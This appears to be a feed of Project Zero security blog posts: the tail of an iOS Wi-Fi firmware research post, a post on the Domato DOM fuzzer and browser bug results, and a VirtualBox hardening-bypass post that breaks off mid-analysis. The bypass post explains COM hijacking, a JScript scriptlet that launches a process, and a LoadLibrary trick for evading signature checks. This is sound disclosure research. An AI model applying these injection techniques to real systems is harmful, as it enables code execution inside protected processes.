So how are the allocations themselves performed? During zones’ lifetimes, they must keep track of the their internal metadata, including the zone’s size, the number of stored elements and many other bits and pieces. More importantly, however, the zone must track the state of the memory pages assigned to it. During the kernel’s lifetime, many objects are allocated and subsequently freed, causing the different zones’ pages to fill up or vacate. If each allocation triggered an iteration over all possible pages while searching for vacancies, kalloc would be quite inefficient. Instead, this is tackled by keeping track of several queues, each denoting the state of the memory pages assigned to the zone.
Among the queues stored in each zone are two queues of particular interest to us:
  • The “intermediate” queue - contains pages with both vacancies and allocated objects.
  • The “all used” queue -  contains pages with no vacancies (only filled with objects).

Putting it all together, we can identify allocated objects in kalloc by simply following the same mechanisms as those used by the allocator to locate the target zone. Once we find the matching zone, we’ll parse its queues to locate each allocation made within the zone, stopping only when we reach our target object.

Finally, we can package all of the above into a module in our analysis framework. The module allows us to either manually iterate over zones’ queues, or to locate objects by their virtual table (optionally accepting the allocation size to quickly locate the relevant zone).
Using our new kalloc module, we can search for the PCIe object using the VTable address we found earlier on. After doing so, we are finally greeted with a positive result -- the object is successfully located within the kernel’s VAS! Next, we’ll simply follow the same steps we identified in the memory accessors analysed earlier on, in order to extract the location of the suspected TCM mapping within the kernel.
Since the TCM mapping provides a view into the Wi-Fi chip’s RAM, we’d naturally expect it to begin with the same values as those we had identified in the RAM file extracted from the firmware. Let’s try and read out some of the values from the buffer and see whether it matches the RAM dump:

Great! So we’ve finally found the TCM. This brings us one step closer to acquiring the ROM, and to building a research environment for the Wi-Fi SoC.
Acquiring the ROM
The TCM mapping provides a view into the Wi-Fi chip’s RAM. While accessing the RAM is undoubtedly useful (as it allows us to gain visibility into the runtime structures used by the chip, such as the heap’s state), it does not allow us to directly access the chip’s ROM. So why did we go to all of this effort to begin with? Well, while thus far we have only used the mapped TCM buffer to read the Wi-Fi SoC’s RAM, recall that the same mapping also allows us to freely write to it -- any data written to the memory-mapped buffer is automatically reflected back to the Wi-Fi SoC’s RAM.
Therefore, we can leverage our newly acquired write access to the chip’s RAM in order to modify the chip’s behaviour. Perhaps most importantly, we can insert hooks into RAM-resident functions in the firmware, and direct their flow towards our own code chunks. As we’ve already built a patching infrastructure in the previous blog posts, we can incorporate the same code as a module in our analysis framework!
Doing so allows us to provide a convenient interface through which we simply select a target RAM function and provide a corresponding assembly stub, and the framework then proceeds to patch the function on our behalf, direct it into our shellcode to execute our hook (and emulate the original prologue), and finally return back to the original function. The shellcode stub itself is written into the top of the heap’s largest free chunk, allowing us to avoid overwriting any important data structures in the RAM.

Building on this technique, let’s insert a hook into a commonly invoked RAM function (such the the chip’s “ioctl” handler). Once invoked, our hook will simply copy small “windows” of the ROM into predetermined regions in RAM. Note that since the RAM is only slightly larger than the ROM, we cannot leak the entire ROM in one go, so we’ll have to resort to this iterative approach instead. Once a ROM chunk is copied, our shellcode stub signals completion, cause the host to subsequently extract the leaked ROM contents and notify the stub that the next chunk of ROM may be leaked.

Indeed, after inserting the hook and running the scheme detailed above, we are finally presented with a complete copy of the chip’s ROM. Now we can finally move on to analysing the firmware image!
To properly load the firmware into a disassembler, we’ll need to locate the ROM and RAM’s loading addresses, as well as their respective sizes. As we’ve seen in the past, the chip’s ROM is mapped at address zero and spans several KBs. The RAM, on the other hand, is normally mapped at a fixed, higher address.
There are multiple ways in which the RAM’s loading address can be deduced. First, the RAM blob analysed previously embeds its own loading address at a fixed offset. We can verify the address’s validity by attempting to load the RAM at this offset in a disassembler and observing that all the branches resolve correctly. Alternately, we can extract the loading address from the PCIe object we identified earlier in the kernel, as it contains both attributes as fields in the object.
Regardless, all of the above methods yield the same result -- the RAM is loaded at address 0x160000, and is 0xE0000 bytes long:

Building a Wi-Fi Firmware Debugger
Having extracted the ROM and achieved TCM access capabilities, we can also build a module to allow us to easily interact with the Wi-Fi chip. This module will act as a debugger of sorts for the Wi-Fi firmware, allowing us to gain full read/write capabilities to the Wi-Fi firmware, as well as providing several key debugging features.
Among the features present in our debugger are the abilities to inspect the heap’s freelist, execute assembly code chunks directly on the firmware, and even hook RAM-resident functions.
In the next blog post we’ll continue expanding the functionality provided by this module as we go along, resulting in a more complete research framework.
Wrapping Up
In this blog post we’ve performed our initial investigation into the Wi-Fi stack on Apple’s mobile devices. Using a privileged research platform to poke around the kernel, we managed to locate the Wi-Fi firmware’s TCM mapping in the host, and to extract the Wi-Fi chip’s ROM for further analysis. We also started fleshing out our research platform within the iOS kernel, allowing us to build our very own Wi-Fi firmware debugger, as well several modules for parsing the kernel’s structures -- useful tools for the next stage of our research!
In the next blog post, we’ll use our firmware debugger in order to continue our exploration of the Wi-Fi chip present on the iPhone 7. We’ll perform a deep dive into the firmware, discover multiple vulnerabilities and develop an over-the-air exploit for one of them, allowing us to gain full control over the Wi-Fi SoC.
Categories: Security

The Great DOM Fuzz-off of 2017

Google Project Zero - Thu, 09/21/2017 - 12:35
Posted by Ivan Fratric, Project ZeroIntroductionHistorically, DOM engines have been one of the largest sources of web browser bugs. And while in the recent years the popularity of those kinds of bugs in targeted attacks has somewhat fallen in favor of Flash (which allows for cross-browser exploits) and JavaScript engine bugs (which often result in very powerful exploitation primitives), they are far from gone. For example, CVE-2016-9079 (a bug that was used in November 2016 against Tor Browser users) was a bug in Firefox’s DOM implementation, specifically the part that handles SVG elements in a web page. It is also a rare case that a vendor will publish a security update that doesn’t contain fixes for at least several DOM engine bugs.
An interesting property of many of those bugs is that they are more or less easy to find by fuzzing. This is why a lot of security researchers as well as browser vendors who care about security invest into building DOM fuzzers and associated infrastructure.
As a result, after joining Project Zero, one of my first projects was to test the current state of resilience of major web browsers against DOM fuzzing.The fuzzerFor this project I wanted to write a new fuzzer which takes some of the ideas from my previous DOM fuzzing projects, but also improves on them and implements new features. Starting from scratch also allowed me to end up with cleaner code that I’m open-sourcing together with this blog post. The goal was not to create anything groundbreaking - as already noted by security researchers, many DOM fuzzers have begun to look like each other over time. Instead the goal was to create a fuzzer that has decent initial coverage, is easily understandable and extendible and can be reused by myself as well as other researchers for fuzzing other targets besides just DOM fuzzing.
We named this new fuzzer Domato (credits to Tavis for suggesting the name). Like most DOM fuzzers, Domato is generative, meaning that the fuzzer generates a sample from scratch given a set of grammars that describes HTML/CSS structure as well as various JavaScript objects, properties and functions.
The fuzzer consists of several parts:
  • The base engine that can generate a sample given an input grammar. This part is intentionally fairly generic and can be applied to other problems besides just DOM fuzzing.
  • The main script that parses the arguments and uses the base engine to create samples. Most logic that is DOM specific is captured in this part.
  • A set of grammars for generating HTML, CSS and JavaScript code.

One of the most difficult aspects in the generation-based fuzzing is creating a grammar or another structure that describes the samples that are going to be created. In the past I experimented with manually created grammars as well as grammars extracted automatically from web browser code. Each of these approaches has advantages and drawbacks, so for this fuzzer I decided to use a hybrid approach:
  1. I initially extracted DOM API declarations from .idl files in Google Chrome Source. Similarly, I parsed Chrome’s layout tests to extract common (and not so common) names and values of various HTML and CSS properties.
  2. Afterwards, this automatically extracted data was heavily manually edited to make the generated samples more likely to trigger interesting behavior. One example of this are functions and properties that take strings as input: Just because a DOM property takes a string as an input does not mean that any string would have a meaning in the context of that property.

Otherwise, Domato supports features that you’d expect from a DOM fuzzer such as:
  • Generating multiple JavaScript functions that can be used as targets for various DOM callbacks and event handlers
  • Implicit (through grammar definitions) support for “interesting” APIs (e.g. the Range API) that have historically been prone to bugs.

Instead of going into much technical details here, the reader is referred to the fuzzer code and documentation at It is my hope that by open-sourcing the fuzzer I would invite community contributions that would cover the areas I might have missed in the fuzzer or grammar creation.SetupWe tested 5 browsers with the highest market share: Google Chrome, Mozilla Firefox, Internet Explorer, Microsoft Edge and Apple Safari. We gave each browser approximately 100.000.000 iterations with the fuzzer and recorded the crashes. (If we fuzzed some browsers for longer than 100.000.000 iterations, only the bugs found within this number of iterations were counted in the results.) Running this number of iterations would take too long on a single machine and thus requires fuzzing at scale, but it is still well within the pay range of a determined attacker. For reference, it can be done for about $1k on Google Compute Engine given the smallest possible VM size, preemptable VMs (which I think work well for fuzzing jobs as they don’t need to be up all the time) and 10 seconds per run.
Here are additional details of the fuzzing setup for each browser:
  • Google Chrome was fuzzed on an internal Chrome Security fuzzing cluster called ClusterFuzz. To fuzz Google Chrome on ClusterFuzz we simply needed to upload the fuzzer and it was run automatically against various Chrome builds.

  • Mozilla Firefox was fuzzed on internal Google infrastructure (linux based). Since Mozilla already offers Firefox ASAN builds for download, we used that as a fuzzing target. Each crash was additionally verified against a release build.

  • Internet Explorer 11 was fuzzed on Google Compute Engine running Windows Server 2012 R2 64-bit. Given the lack of ASAN build, page heap was applied to iexplore.exe process to make it easier to catch some types of issues.

  • Microsoft Edge was the only browser we couldn’t easily fuzz on Google infrastructure since Google Compute Engine doesn’t support Windows 10 at this time and Windows Server 2016 does not include Microsoft Edge. That’s why for fuzzing it we created a virtual cluster of Windows 10 VMs on Microsoft Azure. Same as with Internet Explorer, page heap was applied to MicrosoftEdgeCP.exe process before fuzzing.

  • Instead of fuzzing Safari directly, which would require Apple hardware, we instead used WebKitGTK+ which we could run on internal (Linux-based) infrastructure. We created an ASAN build of the release version of WebKitGTK+. Additionally, each crash was verified against a nightly ASAN WebKit build running on a Mac.
ResultsWithout further ado, the number of security bugs found in each browsers are captured in the table below.
Only security bugs were counted in the results (doing anything else is tricky as some browser vendors fix non-security crashes while some don’t) and only bugs affecting the currently released version of the browser at the time of fuzzing were counted (as we don’t know if bugs in development version would be caught by internal review and fuzzing process before release).
VendorBrowserEngineNumber of BugsProject Zero Bug IDsGoogleChromeBlink2994, 1024MozillaFirefoxGecko4*1130, 1155, 1160, 1185MicrosoftInternet ExplorerTrident41011, 1076, 1118, 1233MicrosoftEdgeEdgeHtml61011, 1254, 1255, 1264, 1301, 1309AppleSafariWebKit17999, 1038, 1044, 1080, 1082, 1087, 1090, 1097, 1105, 1114, 1241, 1242, 1243, 1244, 1246, 1249, 1250Total31***While adding the number of bugs results in 33, 2 of the bugs affected multiple browsers**The root cause of one of the bugs found in Mozilla Firefox was in the Skia graphics library and not in Mozilla source. However, since the relevant code was contributed by Mozilla engineers, I consider it fair to count here.
As can be seen in the table most browsers did relatively well in the experiment with only a couple of security relevant crashes found. Since using the same methodology used to result in significantly higher number of issues just several years ago, this shows clear progress for most of the web browsers. For most of the browsers the differences are not sufficiently statistically significant to justify saying that one browser’s DOM engine is better or worse than another.
However, Apple Safari is a clear outlier in the experiment with significantly higher number of bugs found. This is especially worrying given attackers’ interest in the platform as evidenced by the exploit prices and recent targeted attacks. It is also interesting to compare Safari’s results to Chrome’s, as until a couple of years ago, they were using the same DOM engine (WebKit). It appears that after the Blink/Webkit split either the number of bugs in Blink got significantly reduced or a significant number of bugs got introduced in the new WebKit code (or both). To attempt to address this discrepancy, I reached out to Apple Security proposing to share the tools and methodology. When one of the Project Zero members decided to transfer to Apple, he contacted me and asked if the offer was still valid. So Apple received a copy of the fuzzer and will hopefully use it to improve WebKit.
It is also interesting to observe the effect of MemGC, a use-after-free mitigation in Internet Explorer and Microsoft Edge. When this mitigation is disabled using the registry flag OverrideMemoryProtectionSetting, a lot more bugs appear. However, Microsoft considers these bugs strongly mitigated by MemGC and I agree with that assessment. Given that IE used to be plagued with use-after-free issues, MemGC is an example of an useful mitigation that results in a clear positive real-world impact. Kudos to Microsoft’s team behind it!
When interpreting the results, it is very important to note that they don’t necessarily reflect the security of the whole browser and instead focus on just a single component (DOM engine), but one that has historically been a source of many security issues. This experiment does not take into account other aspects such as presence and security of a sandbox, bugs in other components such as scripting engines etc. I can also not disregard the possibility that, within DOM, my fuzzer is more capable at finding certain types of issues than other, which might have an effect on the overall stats.Experimenting with coverage-guided DOM fuzzingSince coverage-guided fuzzing seems to produce very good results in other areas we wanted to combine it with the DOM fuzzing. We built an experimental coverage-guided DOM fuzzer and ran it against Internet Explorer. IE was selected as a target both because of the author's familiarity with it and because it is very easy to limit coverage collection to just the DOM component (mshtml.dll). The experimental fuzzer used a modified Domato engine to generate mutations and used a modified WinAFL's DynamoRIO client to measure coverage. The fuzzing flow worked roughly as follows:
  1. The fuzzer generates a new set of samples by mutating existing samples in the corpus.
  2. The fuzzer spawns IE process which opens a harness HTML page.
  3. The harness HTML page instructs the fuzzer to start measuring coverage and loads one of the samples in an iframe
  4. After the sample executes, it notifies the harness which notifies the fuzzer to stop collecting coverage.
  5. Coverage map is examined and if it contains unseen coverage, the corresponding sample is added to the corpus.
  6. Go to step 3 until all samples are executed or the IE process crashes
  7. Periodically minimize the corpus using the AFL’s cmin algorithm.
  8. Go to step 1.

The following set of mutations was used to produce new samples from the existing ones:
  • Adding new CSS rules
  • Adding new properties to the existing CSS rules
  • Adding new HTML elements
  • Adding new properties to the existing HTML elements
  • Adding new JavaScript lines. The new lines would be aware of the existing JavaScript variables and could thus reuse them.

Unfortunately, while we did see a steady increase in the collected coverage over time while running the fuzzer, it did not result in any new crashes (i.e. crashes that would not be discovered using dumb fuzzing). It would appear more investigation is required in order to combine coverage information with DOM fuzzing in a meaningful way.ConclusionAs stated before, DOM engines have been one of the largest sources of web browser bugs. While this type of bug are far from gone, most browsers show clear progress in this area. The results also highlight the importance of doing continuous security testing as bugs get introduced with new code and a relatively short period of development can significantly deteriorate a product’s security posture.
The big question at the end is: Are we now at a stage where it is more worthwhile to look for security bugs manually than via fuzzing? Or do more targeted fuzzers need to be created instead of using generic DOM fuzzers to achieve better results? And if we are not there yet - will we be there soon (hopefully)? The answer certainly depends on the browser and the person in question. Instead of attempting to answer these questions myself, I would like to invite the security community to let us know their thoughts.
Categories: Security

Bypassing VirtualBox Process Hardening on Windows

Google Project Zero - Wed, 08/23/2017 - 12:10
Posted by James Forshaw, Project Zero
Processes on Windows are securable objects, which prevents one user logged into a Windows machine from compromising another user’s processes. This is a pretty important security feature, at least from the perspective of a non-administrator user. The security prevents a non-administrator user from compromising the integrity of an arbitrary process. This security barrier breaks down when trying to protect against administrators, specifically administrators with Debug privilege, as enabling this privilege allows the administrator to open any process regardless of the security applied to it.
There are cases where applications or the operating system want to actively defend processes from users such as administrators or even, in some cases, the same user as the running process who’d normally have full access. Protecting the processes is a pretty hard challenge if done entirely from user mode applications. Therefore many solutions use kernel support to perform the protection. In the majority of cases these sorts of techniques still have flaws, which we can exploit to compromise the “protected” process.
This blog post will describe the implementation of Oracle’s VirtualBox protected process and detail three different, but now fixed, ways of bypassing the protection and injecting arbitrary code into the process. The techniques I’ll present can equally be applied to similar implementations of “protected” processes in other applications.Oracle VirtualBox Process HardeningProtecting processes entirely in user mode is pretty much impossible, there are just too many ways of injecting content into a process. This is especially true when the process you’re trying to protect is running under the same context as the user you’re trying to block. An attacker could, for example, open a handle to the process with PROCESS_CREATE_THREAD access and directly inject a new thread. Or they could open a thread in the process with THREAD_SET_CONTEXT access and directly change the Instruction Pointer to jump to an arbitrary location. These are just the direct attacks. The attacker could also modify the registry or environment the process is running under, then force the process to load arbitrary COM objects, or Windows Hooks. The list of possible modifications is almost endless.
Therefore, VirtualBox (VBOX) enlists the help of the kernel to try to protect its processes. The source code refers to this as Process Hardening. VBOX tries to protect the processes from the same user the process is running under. A detailed rationale and technical overview is provided in source code comments. The TL;DR; is the protection gates access to the VBOX kernel drivers, which due to design have a number of methods which can be used to compromise the kernel, or at least elevate privileges. This is why VBOX tries to prevent the current user compromising the process, getting access to the VBOX kernel driver would be a route to Kernel or System privileges. As we’ll see though while some protections also prevent administrators compromising the processes that’s not the aim of the hardening code.
Multiple examples of issues with the driver and protection from device access were discovered by my colleague Jann in VBOX on Linux. On Linux, VBOX limits access to the VBOX driver to root only, and uses SUID binaries to allow the VBOX user processes to get access to the driver before dropping privileges. On Windows instead of SUID binaries the VBOX driver uses kernel APIs to try to stop users and administrators opening protected processes and injecting code.
The core of the kernel component is in the Support\win\SUPDrv-win.cpp file. This code registers with two callback mechanisms supported by modern Windows kernels:
  1. PsSetCreateProcessNotifyRoutineEx - Driver is notified when a new process is created.
  2. ObRegisterCallback - Driver is notified when Process and Thread handles are created or duplicated.
The notification from PsSetCreateProcessNotifyRoutineEx is used to configure the protection structures for a new process. When the process subsequently tries to open a handle to the VBOX driver the hardening will only permit access after the following verification steps are performed in the call to supHardenedWinVerifyProcess:
  1. Ensure there are no debuggers attached to the process.
  2. Ensure there is only a single thread in the process, which should be the one opening the driver to prevent in-process races.
  3. Ensure there are no executable memory pages outside of a small set of permitted DLLs.
  4. Verify the signatures of all loaded DLLs.
  5. Check the main executable’s signature and that it is of a permitted type of executable (e.g. VirtualBox.exe).

Signature verification in the kernel is done using custom runtime code compiled into the driver. Only a limited set of Trusted Roots are permitted to be verified at this step, primarily Microsoft’s OS and Authenticode certificates as well as the Oracle certificate that all VBOX binaries are signed with. You can find the list of permitted certificates in the source repository.
The ObRegisterCallback notification is used to limit the maximum access any other user process on the system can be granted to the protected process. The ObRegisterCallback API was designed for Anti-Virus to protect processes from being injected into or terminated by malicious code. VBOX uses a similar approach and limits any handle to the protected process to the following access rights:

The permitted access rights give the user most of the typical rights they’d expect, such as being able to read memory, synchronize to the process and terminate it but does not allow injecting new code into the process. Similarly, access to threads is restricted to the following access rights to prevent modification of a thread’s context or similar attacks.

We can verify this access limitation by opening the VirtualBox process and one of its threads and see what access rights we’re granted. For example the following picture highlights the process and thread granted access.

While the kernel callbacks prevent direct modification of the process as well as a user trying to compromise the integrity of the process at startup they do very little against runtime DLL injection such as through COM. The hardening implementation needs to decide on what modules it’ll allow to be loaded into the process. The decision, fundamentally, is based on Authenticode code signing.
There are mitigation options to enable loading only Microsoft signed binaries (such as PROCESS_MITIGATION_BINARY_SIGNATURE_POLICY). However, this policy isn’t very flexible. Therefore, protected VBOX processes install hooks to a couple of internal functions in user-mode to verify the integrity of any DLL which is being loaded into memory. The hooked functions are:
  1. LdrLoadDll - Called to load a DLL into memory.
  2. NtCreateSection - Called to create an Image Section object for a PE file on disk.
  3. LdrRegisterDllNotification - This is a quasi-officially supported callback which notifies the application when a new DLL is loaded or unloaded.

These hooks expand the permitted set of signed DLLs which can be loaded. The kernel signature verification is okay for bootstrapping the process as only Oracle and Microsoft code should be present. However, when it comes to running a non-trivial application ( VirtualBox.exe is certainly non-trivial) you’re likely to need to load third-party signed code such as GPU drivers. As the hooks are in user mode it’s easier to call the system WinVerifyTrust API which will verify certificate chains using the system certificate stores as well as handling the verification of files signed in a Catalog file.
If the DLL being loaded doesn’t meet VBOX’s expected criteria for signing then the user-mode hooks will reject loading that DLL. VBOX still doesn't completely trust the user; WinVerifyTrust will chain certificates back to a root certificate in the user’s CA certificates. However, VBOX will only trust system CA certificates. As a non-administrator cannot add a new trusted root certificate to the system’s list of CA certificates this should severely limit the injection of malicious DLLs.
You can get a real code signing certificate which should also be trusted, but the assumption is malicious code wouldn’t want to go down that route. Even if the code is signed the loader also checks that the DLL file is owned by the TrustedInstaller user. This is checked in supHardNtViCheckIsOwnedByTrustedInstallerOrSimilar. A normal user should not be able to change the owner of a file to anything but themselves, therefore it should limit the impact of the behavior to allow any signed file to load.
The VBOX code does have a function which is supposed to restrict what certificates are permitted supR3HardenedWinIsDesiredRootCA as roots. In official builds the function’s whitelist of specific CAs is commented out. There’s a blacklist of certificates, however, unless your company is called “U.S. Robots and Mechanical Men, Inc” the blacklist won’t affect you.
Even with all this protection the process isn’t secure against an administrator. While an administrator can’t bypass the security on opening the process, they can install a local machine Trusted Root CA certificate and sign a DLL, set its owner and force it to be loaded. This will bypass the image verification and load into the verified VBOX process.
In summary the VBOX hardening is attempting to provide the following protections:
  1. Ensure that no code is injected into protected binaries during initialization.
  2. Prevent user processes from opening “writable” handles to protected processes or threads which would allow arbitrary code injection.
  3. Prevent injection of untrusted DLLs through normal loading routes such as COM.

This whole process is likely to have some bugs and edge cases. There’s so many different verification checks which must all fit together. So, assuming we don’t want to get a code signing certificate and we don’t have administrator rights how can we get arbitrary code running inside a protected VBOX process? We’ll focus primarily on the third protection in the list, as this is perhaps the most complex part of the protection and therefore is likely to have the most issues.Exploiting the Chain-of-Trust in COM RegistrationThe first bug I’m going to describe was fixed as CVE-2017-3563 in VBOX version 5.0.38/5.1.20. This issue exploits the chain-of-trust for DLL loading to trick VBOX into loading Microsoft signed DLLs which just happen to allow untrusted arbitrary code execution.
If you run Process Monitor against the protected VBOX process you’ll notice that it uses COM, specifically it uses the VirtualBoxClient class which is implemented in the VBoxC.dll COM server.

The nice thing about COM server registration, at least from the perspective of an attacker, is the registration for a COM object can be in one of two places, the user’s registry hive, or the local machine registry hive. For reasons of compatibility the user’s hive is checked first, before falling back to the local machine hive. Therefore it’s possible to override a COM registration with a normal user’s permission, so when an application tries to load the designated COM object the application will instead load whatever DLL we’ve overridden it with.
Hijacking COM objects is not a new technique, it’s been known for many years especially for the purposes of Malware persistence. It’s seen a resurgence of late because of the renewed interest in all things COM. However, it’s rare that COM hijacking is of importance for elevation of privilege outside of UAC bypasses.
As an aside, the connection between UAC and COM hijacking is the COM runtime actively tries to prevent the hijack being used as an EoP route by disabling certain User registry lookups if the current process is elevated. Of course it wasn’t always successful. This behavior only makes sense if you view UAC through the prism of it being a defendable security boundary, which Microsoft categorically claim it’s not and never was. For example this blog post from early 2007 specifically states this behavior is to prevent Elevation of Privilege. I think the COM lookup behavior is one of the clearest indicators that UAC was originally designed to be a security boundary. It failed to meet the security bar and so was famously retconned into helping “developers” write better code.
If we could replace the COM registration with our own code we should be able to get code execution inside the hardened process. In theory all the hardening signing checks should stop us from loading untrusted code. In research, it’s always worth trying something which you believe should fail just in case as sometimes you get a nice surprise. At minimum it’ll give you insight into how the protection really works. I registered a COM object to hijack the VirtualBoxClient class in the user’s hive and pointed it at an unsigned DLL (Full Disclosure, I used an admin account to tweak the Owner to TrustedInstaller just to test). When I tried to start a Virtual Machine I got the following dialog.

It’s possible that I just made a mistake in the COM registration, however testing the COM object in a separate application worked as expected. Therefore this error is likely a result of failing to load the DLL. Fortunately, VBOX is generous and enables by default a log of all Process Hardening events. It’s named VBoxHardening.log and is located in the Logs folder in the Virtual Machine you tried to start. Searching for the name of the DLL we find the following entries (heavily modified for brevity):
supHardenedWinVerifyImageByHandle: -> -22900 (c:\dummy\testdll.dll) supR3HardenedScreenImage/LdrLoadDll: c:\dummy\testdll.dll: Not signed.supR3HardenedMonitor_LdrLoadDll: rejecting 'c:\dummy\testdll.dll'supR3HardenedMonitor_LdrLoadDll: returns rcNt=0xc0000190
So clearly our test DLL isn’t signed and so the LdrLoadDll hook rejects it. The LdrLoadDll hook returns an error code which propagates back up to the COM DLL loader, which results in COM thinking the class doesn’t exist.
While it’s not surprising that it wasn’t as simple as just specifying our own DLL (and don’t forget we cheated with setting the Owner) it at least gives us hope as this result means the VBOX process will use our hijacked COM registration. All we need therefore is a COM object which meets the following criteria:
  1. It’s signed by a trusted certificate.
  2. It’s owned by TrustedInstaller.
  3. When loaded will do something that allows for arbitrary code execution in the process.

Criteria 1 and 2 are easy to meet, any Microsoft COM object on the system is signed by a trusted certificate (one of Microsoft’s publisher certificates) and is almost certainly owned by TrustedInstaller. However, criteria 3 would seem much more difficult to meet, a COM object is usually implemented inside the DLL and we can’t modify the DLL itself, otherwise it would no longer be signed. It just so happens that there is a Microsoft signed COM object installed by default which will allow us to meet criteria 3, Windows Script Components (WSC).
WSC, also sometimes called Scriptlets are also having a good run at the moment. They can be used as an AppLocker bypass as well as being loaded from HTTP URLs. What’s of most interest in this case is they can also be registered as a COM object.
A registered WSC consists of two parts:
  1. The WSC runtime scrobj.dll which acts as the in-process COM server.
  2. A file which contains the implementation of the Scriptlet in a compatible scripting language.

When an application tries to load the registered class scrobj.dll gets loaded into memory. The COM runtime requests a new object of the required class which causes the WSC runtime to go back to the registry to lookup the URL to the implementation Scriptlet file. The WSC runtime then loads the Scriptlet file and executes the embedded script contained in the file in-process. The key here is that as long as scrobj.dll (and any associated script language libraries such as JScript.dll) are valid signed DLLs from VBOX’s perspective then the script code will run as it can never be checked by the hardening code. This would get arbitrary code running inside the hardened process. First let’s check that scrobj.dll is likely to be allowed to be loaded by VBOX. The following screenshot shows the DLL is both signed by Microsoft and is also owned by TrustedInstaller.

So what does a valid Scriptlet file look like? It’s a simple XML file, I’m not going to go into much detail about what each XML element means, other than to point out the script block which will execute arbitrary JScript code. In this case all this Scriptlet will do when loaded is start the Calculator process.
   description ="Component"
 <script language = "JScript" >
 new ActiveXObject('WScript.Shell').Exec('calc');
If you’re written much code in JScript or VBScript you might now notice a problem, these languages can’t do that much unless it’s implemented by a COM object. In the example Scriptlet file we can’t create a new process without loading the WScript.Shell COM object and calling its Exec method. In order to talk to the VBOX driver, which is whole purpose of injecting code in the first place, we’d need a COM object which gives us that functionality. We can’t implement the code in another COM object as that wouldn’t pass the image signing checks we’re trying to bypass. Of course, there’s always memory corruption bugs in scripting engines but, as everyone already knows by now, I’m not a fan of exploiting memory corruptions so we need some other way of getting fully arbitrary code execution. Time to bring in the big guns, the .NET Framework.
The .NET runtime loads code into memory using the normal DLL loading routines. We can’t therefore load a .NET DLL which isn’t signed into memory as that would still get caught by VBOX’s hardening code. However, .NET does support loading arbitrary code from an in-memory array using the Assembly::Load method and once loaded this code can basically act as if it was native code, calling arbitrary APIs and inspecting/modifying memory. As the .NET framework is signed by Microsoft all we need to do is somehow call the Load method from our Scriptlet file and we can get full arbitrary code running inside the process.
Where do we even start on achieving this goal? From a previous blog post it’s possible to expose .NET objects as COM objects through registration and by abusing Binary Serialization we can load arbitrary code from a byte array. Many core .NET runtime classes are automatically registered as COM objects which can be loaded and manipulated by a scripting engine. The big question can now be asked, is BinaryFormatter exposed as a COM object?

Why, yes it is. BinaryFormatter is a .NET object that a scripting engine can load and interact with via COM. We could now take the final binary stream from my previous post and execute arbitrary code from memory. In the previous blog post the execution of the untrusted code had to occur during deserialization, in this case we can interact with the results of deserialization in a script which can make the serialization gadgets we need much simpler.
In the end I chose to deserialize a Delegate object which when executed by the script engine would load an Assembly from memory and return the Assembly instance. The script engine could then instantiate an instance of a Type in that Assembly and run arbitrary code. It does sound simple in principle, in reality there are a number of caveats. Rather than bog down this blog post with more detail than necessary the tool I used to generate the Scriptlet file, DotNetToJScript is available so you can read how it works yourself. Also the PoC is available on the issue tracker here. The chain from the JScript component to being able to call the VBOX driver looks something like the following:

I’m not going to go into what you can now do with the VBOX driver once you’ve got arbitrary code running the hardened process, that’s certainly a topic for another post. Although you might want to look at one of Jann’s issues which describes what you might do on Linux.
How did Oracle fix the issue? They added a blacklist of DLLs which are not allowed to be loaded by the hardened VBOX process. The only DLL currently in that list is scrobj.dll. The list is checked after the verification of the file has taken place and covers both the current filename as well as the internal Original Filename in the version resources. This prevents you just renaming the file to something else, as the version resources are part of the signed PE data and so cannot be modified without invalidating the signature. In fairness to Oracle I’m not sure there was any other sensible way of blocking this attack vector other than a DLL blacklist.Exploiting User-Mode DLL Loading Behavior The second bug I’m going to describe was fixed as CVE-2017-10204 in VBOX version 5.1.24. This issue exploits the behavior of the Windows DLL loader and some bugs in VBOX to trick the hardening code to allow an unverified DLL to be loaded into memory and executed.
While this bug doesn’t rely on exploiting COM loading as such, the per-user COM registration is a convenient technique to get LoadLibrary called with an arbitrary path. Therefore we’ll continue to use the technique of hijacking the VirtualBoxClient COM object and just use the in-process server path as a means to load the DLL.
LoadLibrary is an API with a number of well known, but strange behaviors. One of the more interesting from our perspective is the behavior with filename extensions. Depending on the extension the LoadLibrary API might add or remove the extension before trying to load the file. I can summarise it in a table, showing the file name as passed to LoadLibrary and the file it actually tries to load.
Original File NameLoaded File Namec:\test\abc.dllc:\test\abc.dllc:\test\abcc:\test\abc.dllc:\test\abc.blahc:\test\abc.blahc:\test\abc.c:\test\abc
I’ve highlighted in green the two important cases. These are the cases where the filename passed into LoadLibrary doesn’t match the filename which eventually gets loaded. The problem for any code trying to verify a DLL file before loading it is CreateFile doesn’t follow these rules so in the highlighted cases if you opened the file for signature verification using the original file name you’d verify a different file to the one which eventually gets loaded.
In Windows there’s usually a clear separation between Kernel32 code, which tends to deal with the many weird behaviors Win32 has built up over the years and the “clean” NT layer exposed by the kernel through NTDLL. Therefore as LoadLibrary is in Kernel32 and LdrLoadDll (which is the function the hardening hooks) is in NTDLL then this weird extension behavior would be handled in the former. Let’s look at a very simplified version of LoadLibrary to see if that’s the case:
HMODULE LoadLibrary(LPCWSTR lpLibFileName)
 HMODULE ModuleHandle;
 ULONG Flags = // Flags;

 RtlInitUnicodeString(&DllPath, lpLibFileName);  
     &Flags, &DllPath, &ModuleHandle))) {
   return ModuleHandle;
 return NULL;
We can see in this code that for all intents and purposes LoadLibrary is just a wrapper around LdrLoadDll. While it’s really more complex than that in reality the takeaway is that LoadLibrary does not modify the path it passes to LdrLoadDll in any way other than converting it to a UNICODE_STRING. Therefore perhaps if we specify a DLL to load without an extension VBOX will check the extension-less file for the signature but LdrLoadDll will instead load the file with the .DLL extension.
Before we can test that we’ve got another problem to deal with, the requirement that the file is owned by TrustedInstaller. For the file we want VBOX to signature check all we need to do is give an existing valid, signed file a different filename. This is what hard links were created for; we can create a different name in a directory we control which actually links to a system file which is signed and also maintains its original security descriptor including the owner. The trouble with hard links is, as I described almost 2 years ago in a blog post, while Windows supports creating links to system files you can’t write to, the Win32 APIs, and by extension the easy to access “mklink” command in the CMD shell require the file be opened with FILE_WRITE_ATTRIBUTES access. Instead of using another application to create the link we’ll just copy the file, however the copy will no longer have the original security descriptor and so it’ll no longer be owned by TrustedInstaller. To get around that let’s look at the checking code to see if there’s a way around it.
